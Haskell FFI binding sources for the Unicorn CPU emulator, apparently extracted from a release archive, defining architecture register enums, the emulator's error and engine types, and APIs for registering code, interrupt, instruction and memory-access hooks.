Unicorn.CPU.Arm Description : Definitions for the ARM architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the ARM architecture. -} module Unicorn.CPU.Arm ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include <unicorn/arm.h> -- | ARM registers. {# enum uc_arm_reg as Register { underscoreToCase } omit ( UC_ARM_REG_INVALID , UC_ARM_REG_ENDING ) with prefix = "UC_ARM_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/Arm64.chs000066400000000000000000000012131467524106700226440ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.Arm64 Description : Definitions for the ARM64 (ARMv8) architecture.
Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the ARM64 (ARMv8) architecture. -} module Unicorn.CPU.Arm64 ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include <unicorn/arm64.h> -- | ARM64 registers. {# enum uc_arm64_reg as Register { underscoreToCase } omit ( UC_ARM64_REG_INVALID , UC_ARM64_REG_ENDING ) with prefix = "UC_ARM64_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/M68k.chs000066400000000000000000000011641467524106700225050ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.M68k Description : Definitions for the M68K architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the M68K architecture. -} module Unicorn.CPU.M68k ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include <unicorn/m68k.h> -- | M68K registers. {# enum uc_m68k_reg as Register { underscoreToCase } omit ( UC_M68K_REG_INVALID , UC_M68K_REG_ENDING ) with prefix = "UC_M68K_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/Mips.chs000066400000000000000000000030511467524106700226650ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.Mips Description : Definitions for the MIPS architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the MIPS architecture. -} module Unicorn.CPU.Mips ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include <unicorn/mips.h> -- | MIPS registers. {# enum UC_MIPS_REG as Register { underscoreToCase , UC_MIPS_REG_0 as Reg0g , UC_MIPS_REG_1 as Reg1g , UC_MIPS_REG_2 as Reg2g , UC_MIPS_REG_3 as Reg3g , UC_MIPS_REG_4 as Reg4g , UC_MIPS_REG_5 as Reg5g , UC_MIPS_REG_6 as Reg6g , UC_MIPS_REG_7 as Reg7g , UC_MIPS_REG_8 as Reg8g , UC_MIPS_REG_9 as Reg9g , UC_MIPS_REG_10 as Reg10g , UC_MIPS_REG_11 as Reg11g , UC_MIPS_REG_12 as Reg12g , UC_MIPS_REG_13 as Reg13g , UC_MIPS_REG_14 as Reg14g , UC_MIPS_REG_15 as Reg15g , UC_MIPS_REG_16 as Reg16g , UC_MIPS_REG_17 as Reg17g , UC_MIPS_REG_18 as Reg18g , UC_MIPS_REG_19 as Reg19g , UC_MIPS_REG_20 as Reg20g , UC_MIPS_REG_21 as Reg21g , UC_MIPS_REG_22 as Reg22g , UC_MIPS_REG_23 as Reg23g , UC_MIPS_REG_24 as Reg24g , UC_MIPS_REG_25 as Reg25g , UC_MIPS_REG_26 as Reg26g , UC_MIPS_REG_27 as Reg27g , UC_MIPS_REG_28 as Reg28g , UC_MIPS_REG_29 as Reg29g , UC_MIPS_REG_30 as Reg30g , UC_MIPS_REG_31 as Reg31 } omit ( UC_MIPS_REG_INVALID , UC_MIPS_REG_ENDING ) with prefix = "UC_MIPS_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/Sparc.chs000066400000000000000000000011721467524106700230270ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.Sparc Description : Definitions for the SPARC architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the SPARC architecture. -} module Unicorn.CPU.Sparc ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include <unicorn/sparc.h> -- | SPARC registers.
{# enum uc_sparc_reg as Register { underscoreToCase } omit (UC_SPARC_REG_INVALID , UC_SPARC_REG_ENDING ) with prefix = "UC_SPARC_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/X86.chs000066400000000000000000000037121467524106700223460ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.X86 Description : Definitions for the X86 architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the X86 architecture. -} module Unicorn.CPU.X86 ( Mmr(..) , Register(..) , Instruction(..) ) where import Control.Applicative import Data.Word import Foreign import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include <unicorn/x86.h> -- | Memory-management register for instructions IDTR, GDTR, LDTR, TR. -- Borrowed from SegmentCache in qemu/target-i386/cpu.h data Mmr = Mmr { mmrSelector :: Word16 -- ^ Not used by GDTR and IDTR , mmrBase :: Word64 -- ^ Handle 32 or 64 bit CPUs , mmrLimit :: Word32 , mmrFlags :: Word32 -- ^ Not used by GDTR and IDTR } instance Storable Mmr where sizeOf _ = {# sizeof uc_x86_mmr #} alignment _ = {# alignof uc_x86_mmr #} peek p = Mmr <$> liftA fromIntegral ({# get uc_x86_mmr->selector #} p) <*> liftA fromIntegral ({# get uc_x86_mmr->base #} p) <*> liftA fromIntegral ({# get uc_x86_mmr->limit #} p) <*> liftA fromIntegral ({# get uc_x86_mmr->flags #} p) poke p mmr = do {# set uc_x86_mmr.selector #} p (fromIntegral $ mmrSelector mmr) {# set uc_x86_mmr.base #} p (fromIntegral $ mmrBase mmr) {# set uc_x86_mmr.limit #} p (fromIntegral $ mmrLimit mmr) {# set uc_x86_mmr.flags #} p (fromIntegral $ mmrFlags mmr) -- | X86 registers. {# enum uc_x86_reg as Register { underscoreToCase } omit ( UC_X86_REG_INVALID , UC_X86_REG_ENDING ) with prefix = "UC_X86_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register -- | X86 instructions. {# enum uc_x86_insn as Instruction { underscoreToCase } omit ( UC_X86_INS_INVALID , UC_X86_INS_ENDING ) with prefix = "UC_X86_INS_" deriving (Show, Eq, Bounded) #} unicorn-2.1.1/bindings/haskell/src/Unicorn/Hook.hs000066400000000000000000000220211467524106700220610ustar00rootroot00000000000000{-| Module : Unicorn.Hook Description : Unicorn hooks. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Insert hook points into the Unicorn emulator engine. -} module Unicorn.Hook ( -- * Hook types Hook , MemoryHookType(..) , MemoryEventHookType(..) , MemoryAccess(..) -- * Hook callbacks , CodeHook , InterruptHook , BlockHook , InHook , OutHook , SyscallHook , MemoryHook , MemoryReadHook , MemoryWriteHook , MemoryEventHook -- * Hook callback management , codeHookAdd , interruptHookAdd , blockHookAdd , inHookAdd , outHookAdd , syscallHookAdd , memoryHookAdd , memoryEventHookAdd , hookDel ) where import Control.Monad import Control.Monad.Trans.Class import Control.Monad.Trans.Except (ExceptT (..), throwE) import Foreign import Unicorn.Internal.Core import Unicorn.Internal.Hook import qualified Unicorn.CPU.X86 as X86 ------------------------------------------------------------------------------- -- Hook callback management (registration and deletion) ------------------------------------------------------------------------------- -- | Register a callback for a code hook event. codeHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> CodeHook a -- ^ Code hook callback -> a -- ^ User-defined data.
This will be passed to -- the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' -- on failure codeHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalCodeHook callback getResult $ ucHookAdd uc HookCode funPtr userDataPtr begin end -- | Register a callback for an interrupt hook event. interruptHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> InterruptHook a -- ^ Interrupt callback -> a -- ^ User-defined data. This will be passed -- to the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or 'Error' -- on failure interruptHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalInterruptHook callback getResult $ ucHookAdd uc HookIntr funPtr userDataPtr begin end -- | Register a callback for a block hook event. blockHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> BlockHook a -- ^ Block callback -> a -- ^ User-defined data. This will be passed to -- the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' -- on failure blockHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalBlockHook callback getResult $ ucHookAdd uc HookBlock funPtr userDataPtr begin end -- | Register a callback for an IN instruction hook event (X86). inHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> InHook a -- ^ IN instruction callback -> a -- ^ User-defined data. This will be passed to the -- callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' on -- failure inHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalInHook callback getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end X86.In -- | Register a callback for an OUT instruction hook event (X86). outHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> OutHook a -- ^ OUT instruction callback -> a -- ^ User-defined data. This will be passed to the -- callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' on -- failure outHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalOutHook callback getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end X86.Out -- | Register a callback for a SYSCALL instruction hook event (X86). syscallHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> SyscallHook a -- ^ SYSCALL instruction callback -> a -- ^ User-defined data. This will be passed to -- the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' -- on failure syscallHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalSyscallHook callback getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end X86.Syscall -- | Register a callback for a valid memory access event. memoryHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> MemoryHookType -- ^ A valid memory access (e.g. 
read, write, -- etc.) to trigger the callback on -> MemoryHook a -- ^ Memory access callback -> a -- ^ User-defined data. This will be passed to -- the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' -- on failure memoryHookAdd uc memHookType callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalMemoryHook callback getResult $ ucHookAdd uc memHookType funPtr userDataPtr begin end -- | Register a callback for an invalid memory access event. memoryEventHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> MemoryEventHookType -- ^ An invalid memory access (e.g. -- read, write, etc.) to trigger -- the callback on -> MemoryEventHook a -- ^ Invalid memory access callback -> a -- ^ User-defined data. This will -- be passed to the callback -- function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or -- an 'Error' on failure memoryEventHookAdd uc memEventHookType callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalMemoryEventHook callback getResult $ ucHookAdd uc memEventHookType funPtr userDataPtr begin end -- | Unregister (remove) a hook callback. hookDel :: Engine -- ^ 'Unicorn' engine handle -> Hook -- ^ 'Hook' handle -> Emulator () -- ^ An 'Error' on failure hookDel uc hook = do err <- lift $ ucHookDel uc hook if err == ErrOk then pure () else throwE err ------------------------------------------------------------------------------- -- Helper functions ------------------------------------------------------------------------------- -- Takes the tuple returned by `ucHookAdd`, an IO (Error, Hook), and -- returns either a `Right Hook` if no error occurred or a `Left Error` if an -- error occurred getResult :: IO (Error, Hook) -> IO (Either Error Hook) getResult = liftM (uncurry checkResult) where checkResult err hook = if err == ErrOk then Right hook else Left err unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/000077500000000000000000000000001467524106700224045ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/Core.chs000066400000000000000000000025721467524106700240010ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.Internal.Core Description : Core Unicorn components. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Defines core Unicorn components. This module should not be directly imported; it is only exposed because of the way cabal handles ordering of chs files. -} module Unicorn.Internal.Core where import Control.Monad import Control.Monad.Trans.Except (ExceptT) import Foreign {# context lib = "unicorn" #} #include <unicorn/unicorn.h> #include "unicorn_wrapper.h" -- | The Unicorn engine. {# pointer *uc_engine as Engine foreign finalizer uc_close_wrapper as close newtype #} -- | A pointer to a Unicorn engine. {# pointer *uc_engine as EnginePtr -> Engine #} -- | Make a new Unicorn engine out of an engine pointer. The returned Unicorn -- engine will automatically call 'uc_close_wrapper' when it goes out of scope. mkEngine :: EnginePtr -> IO Engine mkEngine ptr = liftM Engine (newForeignPtr close ptr) -- | Errors encountered by the Unicorn API. These values are returned by -- 'errno'.
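--
-- A typical pattern (a sketch; @runEmulator@ and @strerror@ live in the
-- top-level Unicorn module) is to inspect the result of an emulation run:
--
-- > result <- runEmulator program
-- > case result of
-- >     Right _  -> putStrLn "OK"
-- >     Left err -> putStrLn $ "Failed with error " ++ show err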
{# enum uc_err as Error { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | The emulator runs in the IO monad and allows for the handling of errors -- "under the hood". type Emulator a = ExceptT Error IO a -- | An architecture-dependent register. class Enum a => Reg a unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/Hook.chs000066400000000000000000000363751467524106700240160ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.Internal.Hook Description : Unicorn hooks. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Low-level bindings for inserting hook points into the Unicorn emulator engine. This module should not be directly imported; it is only exposed because of the way cabal handles ordering of chs files. -} module Unicorn.Internal.Hook ( -- * Types Hook , HookType(..) , MemoryHookType(..) , MemoryEventHookType(..) , MemoryAccess(..) -- * Hook callback bindings , CodeHook , InterruptHook , BlockHook , InHook , OutHook , SyscallHook , MemoryHook , MemoryReadHook , MemoryWriteHook , MemoryEventHook -- * Hook marshalling , marshalCodeHook , marshalInterruptHook , marshalBlockHook , marshalInHook , marshalOutHook , marshalSyscallHook , marshalMemoryHook , marshalMemoryReadHook , marshalMemoryWriteHook , marshalMemoryEventHook -- * Hook registration and deletion bindings , ucHookAdd , ucInsnHookAdd , ucHookDel ) where import Control.Monad import Foreign import Unicorn.Internal.Util {# import Unicorn.Internal.Core #} {# import Unicorn.CPU.X86 #} {# context lib = "unicorn" #} #include <unicorn/unicorn.h> #include "unicorn_wrapper.h" ------------------------------------------------------------------------------- -- Types ------------------------------------------------------------------------------- -- When we pass a Unicorn engine to a hook callback, we do not want this engine -- object to be freed automatically when the callback returns (which is what -- would typically occur when using a ForeignPtr), because we want to continue -- using the Unicorn engine outside the callback. To avoid this, -- unicorn_wrapper.h provides a dummy "close" function that does nothing. When -- we go to create a Unicorn engine to pass to a callback, we use a pointer to -- this dummy close function as the finalizer pointer. When the callback -- returns, the Unicorn engine remains untouched! -- -- XX Is there a better way to do this? foreign import ccall "&uc_close_dummy" closeDummy :: FunPtr (EnginePtr -> IO ()) mkEngineNC :: EnginePtr -> IO Engine mkEngineNC ptr = liftM Engine (newForeignPtr closeDummy ptr) -- | A Unicorn hook. type Hook = {# type uc_hook #} -- Hook types. These are used internally within this module by the callback -- registration functions and are not exposed to the user. -- -- Note that both valid and invalid memory access hooks are omitted from -- this enum (and are exposed to the user). {# enum uc_hook_type as HookType { underscoreToCase } omit ( UC_HOOK_MEM_READ_UNMAPPED , UC_HOOK_MEM_WRITE_UNMAPPED , UC_HOOK_MEM_FETCH_UNMAPPED , UC_HOOK_MEM_READ_PROT , UC_HOOK_MEM_WRITE_PROT , UC_HOOK_MEM_FETCH_PROT , UC_HOOK_MEM_READ , UC_HOOK_MEM_WRITE , UC_HOOK_MEM_FETCH , UC_HOOK_MEM_READ_AFTER ) with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Memory hook types (for valid memory accesses).
{# enum uc_hook_type as MemoryHookType { underscoreToCase } omit ( UC_HOOK_INTR , UC_HOOK_INSN , UC_HOOK_CODE , UC_HOOK_BLOCK , UC_HOOK_MEM_READ_UNMAPPED , UC_HOOK_MEM_WRITE_UNMAPPED , UC_HOOK_MEM_FETCH_UNMAPPED , UC_HOOK_MEM_READ_PROT , UC_HOOK_MEM_WRITE_PROT , UC_HOOK_MEM_FETCH_PROT ) with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Memory event hook types (for invalid memory accesses). {# enum uc_hook_type as MemoryEventHookType { underscoreToCase } omit ( UC_HOOK_INTR , UC_HOOK_INSN , UC_HOOK_CODE , UC_HOOK_BLOCK , UC_HOOK_MEM_READ , UC_HOOK_MEM_WRITE , UC_HOOK_MEM_FETCH , UC_HOOK_MEM_READ_AFTER ) with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Unify the hook types with a type class. class Enum a => HookTypeC a instance HookTypeC HookType instance HookTypeC MemoryHookType instance HookTypeC MemoryEventHookType -- | Memory access. {# enum uc_mem_type as MemoryAccess { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} ------------------------------------------------------------------------------- -- Hook callbacks ------------------------------------------------------------------------------- -- | Callback function for tracing code. type CodeHook a = Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Address where the code is being executed -> Maybe Int -- ^ Size of machine instruction(s) being -- executed, or 'Nothing' when size is unknown -> a -- ^ User data passed to tracing APIs -> IO () type CCodeHook = EnginePtr -> Word64 -> Word32 -> Ptr () -> IO () foreign import ccall "wrapper" mkCodeHook :: CCodeHook -> IO {# type uc_cb_hookcode_t #} marshalCodeHook :: Storable a => CodeHook a -> IO {# type uc_cb_hookcode_t #} marshalCodeHook codeHook = mkCodeHook $ \ucPtr address size userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr let maybeSize = if size == 0 then Nothing else Just $ fromIntegral size codeHook uc address maybeSize userData -- | Callback function for tracing interrupts. type InterruptHook a = Engine -- ^ 'Unicorn' engine handle -> Int -- ^ Interrupt number -> a -- ^ User data passed to tracing APIs -> IO () type CInterruptHook = EnginePtr -> Word32 -> Ptr () -> IO () foreign import ccall "wrapper" mkInterruptHook :: CInterruptHook -> IO {# type uc_cb_hookintr_t #} marshalInterruptHook :: Storable a => InterruptHook a -> IO {# type uc_cb_hookintr_t #} marshalInterruptHook interruptHook = mkInterruptHook $ \ucPtr intNo userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr interruptHook uc (fromIntegral intNo) userData -- | Callback function for tracing blocks. type BlockHook a = CodeHook a marshalBlockHook :: Storable a => BlockHook a -> IO {# type uc_cb_hookcode_t #} marshalBlockHook = marshalCodeHook -- | Callback function for tracing IN instructions (X86). type InHook a = Engine -- ^ 'Unicorn' engine handle -> Int -- ^ Port number -> Int -- ^ Data size (1/2/4) to be read from this port -> a -- ^ User data passed to tracing APIs -> IO Word32 -- ^ The data read from the port type CInHook = EnginePtr -> Word32 -> Int32 -> Ptr () -> IO Word32 foreign import ccall "wrapper" mkInHook :: CInHook -> IO {# type uc_cb_insn_in_t #} marshalInHook :: Storable a => InHook a -> IO {# type uc_cb_insn_in_t #} marshalInHook inHook = mkInHook $ \ucPtr port size userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr inHook uc (fromIntegral port) (fromIntegral size) userData -- | Callback function for tracing OUT instructions (X86).
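--
-- For example, a minimal sketch that just logs each OUT (register it with
-- @outHookAdd@ from the public Unicorn.Hook module):
--
-- > logOut :: OutHook ()
-- > logOut _ port size value _ =
-- >     putStrLn $ "OUT port=" ++ show port ++ ", size=" ++ show size
-- >         ++ ", value=" ++ show value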
type OutHook a = Engine -- ^ 'Unicorn' engine handle -> Int -- ^ Port number -> Int -- ^ Data size (1/2/4) to be written to this port -> Int -- ^ Data value to be written to this port -> a -- ^ User data passed to tracing APIs -> IO () type COutHook = EnginePtr -> Word32 -> Int32 -> Word32 -> Ptr () -> IO () foreign import ccall "wrapper" mkOutHook :: COutHook -> IO {# type uc_cb_insn_out_t #} marshalOutHook :: Storable a => OutHook a -> IO {# type uc_cb_insn_out_t #} marshalOutHook outHook = mkOutHook $ \ucPtr port size value userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr outHook uc (fromIntegral port) (fromIntegral size) (fromIntegral value) userData -- | Callback function for tracing SYSCALL instructions (X86). type SyscallHook a = Engine -- ^ 'Unicorn' engine handle -> a -- ^ User data passed to tracing APIs -> IO () type CSyscallHook = Ptr () -> Ptr () -> IO () foreign import ccall "wrapper" mkSyscallHook :: CSyscallHook -> IO {# type uc_cb_insn_syscall_t #} marshalSyscallHook :: Storable a => SyscallHook a -> IO {# type uc_cb_insn_syscall_t #} marshalSyscallHook syscallHook = mkSyscallHook $ \ucPtr userDataPtr -> do uc <- mkEngineNC $ castPtr ucPtr userData <- castPtrAndPeek userDataPtr syscallHook uc userData -- | Callback function for hooking memory operations. type MemoryHook a = Engine -- ^ 'Unicorn' engine handle -> MemoryAccess -- ^ Memory access; read or write -> Word64 -- ^ Address where the code is being -- executed -> Int -- ^ Size of data being read or written -> Maybe Int -- ^ Value of data being written, or -- 'Nothing' if read -> a -- ^ User data passed to tracing APIs -> IO () type CMemoryHook = EnginePtr -> Int32 -> Word64 -> Int32 -> Int64 -> Ptr () -> IO () foreign import ccall "wrapper" mkMemoryHook :: CMemoryHook -> IO {# type uc_cb_hookmem_t #} marshalMemoryHook :: Storable a => MemoryHook a -> IO {# type uc_cb_hookmem_t #} marshalMemoryHook memoryHook = mkMemoryHook $ \ucPtr memAccessI address size value userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr let memAccess = toMemAccess memAccessI maybeValue = case memAccess of MemRead -> Nothing MemWrite -> Just $ fromIntegral value _ -> error "Invalid memory access" memoryHook uc memAccess address (fromIntegral size) maybeValue userData -- | Callback function for hooking memory reads. type MemoryReadHook a = Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Address where the code is being executed -> Int -- ^ Size of data being read -> a -- ^ User data passed to tracing APIs -> IO () marshalMemoryReadHook :: Storable a => MemoryReadHook a -> IO {# type uc_cb_hookmem_t #} marshalMemoryReadHook memoryReadHook = mkMemoryHook $ \ucPtr _ address size _ userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr memoryReadHook uc address (fromIntegral size) userData -- | Callback function for hooking memory writes.
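--
-- For example, a minimal sketch of a write-logging callback matching this
-- shape:
--
-- > logWrite :: MemoryWriteHook ()
-- > logWrite _ addr size value _ =
-- >     putStrLn $ "WRITE at " ++ show addr ++ ", size = " ++ show size
-- >         ++ ", value = " ++ show value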
type MemoryWriteHook a = Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Address where the code is being -- executed -> Int -- ^ Size of data being written -> Int -- ^ Value of data being written -> a -- ^ User data passed to tracing APIs -> IO () marshalMemoryWriteHook :: Storable a => MemoryWriteHook a -> IO {# type uc_cb_hookmem_t #} marshalMemoryWriteHook memoryWriteHook = mkMemoryHook $ \ucPtr _ address size value userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr memoryWriteHook uc address (fromIntegral size) (fromIntegral value) userData -- | Callback function for handling invalid memory access events. type MemoryEventHook a = Engine -- ^ 'Unicorn' engine handle -> MemoryAccess -- ^ Memory access; read or write -> Word64 -- ^ Address where the code is being -- executed -> Int -- ^ Size of data being read or written -> Maybe Int -- ^ Value of data being written, or -- 'Nothing' if read -> a -- ^ User data passed to tracing APIs -> IO Bool -- ^ Return 'True' to continue, or -- 'False' to stop the program (due to -- invalid memory) type CMemoryEventHook = EnginePtr -> Int32 -> Word64 -> Int32 -> Int64 -> Ptr () -> IO Int32 foreign import ccall "wrapper" mkMemoryEventHook :: CMemoryEventHook -> IO {# type uc_cb_eventmem_t #} marshalMemoryEventHook :: Storable a => MemoryEventHook a -> IO {# type uc_cb_eventmem_t #} marshalMemoryEventHook eventMemoryHook = mkMemoryEventHook $ \ucPtr memAccessI address size value userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr let memAccess = toMemAccess memAccessI maybeValue = case memAccess of MemReadUnmapped -> Nothing MemReadProt -> Nothing MemWriteUnmapped -> Just $ fromIntegral value MemWriteProt -> Just $ fromIntegral value _ -> error "Invalid memory access" res <- eventMemoryHook uc memAccess address (fromIntegral size) maybeValue userData return $ boolToInt res where boolToInt True = 1 boolToInt False = 0 ------------------------------------------------------------------------------- -- Hook callback registration (and deletion) ------------------------------------------------------------------------------- {# fun variadic uc_hook_add as ucHookAdd `HookTypeC h' => { `Engine' , alloca- `Hook' peek* , enumToNum `h' , castFunPtrToPtr `FunPtr b' , castPtr `Ptr a' , `Word64' , `Word64' } -> `Error' #} {# fun variadic uc_hook_add[int] as ucInsnHookAdd `HookTypeC h' => { `Engine' , alloca- `Hook' peek* , enumToNum `h' , castFunPtrToPtr `FunPtr b' , castPtr `Ptr a' , `Word64' , `Word64' , enumToNum `Instruction' } -> `Error' #} -- | Unregister (remove) a hook callback. {# fun uc_hook_del as ^ { `Engine' , fromIntegral `Hook' } -> `Error' #} ------------------------------------------------------------------------------- -- Helper functions ------------------------------------------------------------------------------- toMemAccess :: Integral a => a -> MemoryAccess toMemAccess = toEnum . fromIntegral unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/Unicorn.chs000066400000000000000000000201551467524106700245230ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-# LANGUAGE ScopedTypeVariables #-} {-| Module : Unicorn.Internal.Unicorn Description : The Unicorn CPU emulator. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Low-level bindings for the Unicorn CPU emulator framework. This module should not be directly imported; it is only exposed because of the way cabal handles ordering of chs files. -} module Unicorn.Internal.Unicorn ( -- * Types Architecture(..) 
, Mode(..) , MemoryPermission(..) , MemoryRegion(..) , QueryType(..) , Context -- * Function bindings , ucOpen , ucQuery , ucEmuStart , ucEmuStop , ucRegWrite , ucRegRead , ucRegWriteBatch , ucRegReadBatch , ucMemWrite , ucMemRead , ucMemMap , ucMemUnmap , ucMemProtect , ucMemRegions , mkContext , ucContextAlloc , ucContextSave , ucContextRestore , ucVersion , ucErrno , ucStrerror ) where import Control.Applicative import Control.Monad import Data.ByteString (ByteString, useAsCStringLen) import Foreign import Foreign.C import Prelude hiding (until) import Unicorn.Internal.Util {# import Unicorn.Internal.Core #} {# context lib = "unicorn" #} #include <unicorn/unicorn.h> #include "unicorn_wrapper.h" ------------------------------------------------------------------------------- -- Types ------------------------------------------------------------------------------- -- | CPU architecture. {# enum uc_arch as Architecture { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | CPU hardware mode. {# enum uc_mode as Mode { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Memory permissions. {# enum uc_prot as MemoryPermission { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Memory region mapped by 'memMap'. Retrieve the list of memory regions with -- 'memRegions'. data MemoryRegion = MemoryRegion { mrBegin :: Word64 -- ^ Begin address of the region (inclusive) , mrEnd :: Word64 -- ^ End address of the region (inclusive) , mrPerms :: [MemoryPermission] -- ^ Memory permissions of the region } instance Storable MemoryRegion where sizeOf _ = {# sizeof uc_mem_region #} alignment _ = {# alignof uc_mem_region #} peek p = MemoryRegion <$> liftA fromIntegral ({# get uc_mem_region->begin #} p) <*> liftA fromIntegral ({# get uc_mem_region->end #} p) <*> liftA expandMemPerms ({# get uc_mem_region->perms #} p) poke p mr = do {# set uc_mem_region.begin #} p (fromIntegral $ mrBegin mr) {# set uc_mem_region.end #} p (fromIntegral $ mrEnd mr) {# set uc_mem_region.perms #} p (combineEnums $ mrPerms mr) -- | A pointer to a memory region. {# pointer *uc_mem_region as MemoryRegionPtr -> MemoryRegion #} -- | Query types for the 'query' API. {# enum uc_query_type as QueryType { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Opaque storage for CPU context, used with the context functions. {# pointer *uc_context as Context foreign finalizer uc_free_wrapper as memFree newtype #} -- | A pointer to a CPU context. {# pointer *uc_context as ContextPtr -> Context #} -- | Make a CPU context out of a context pointer. The returned CPU context will -- automatically call 'uc_free' when it goes out of scope.
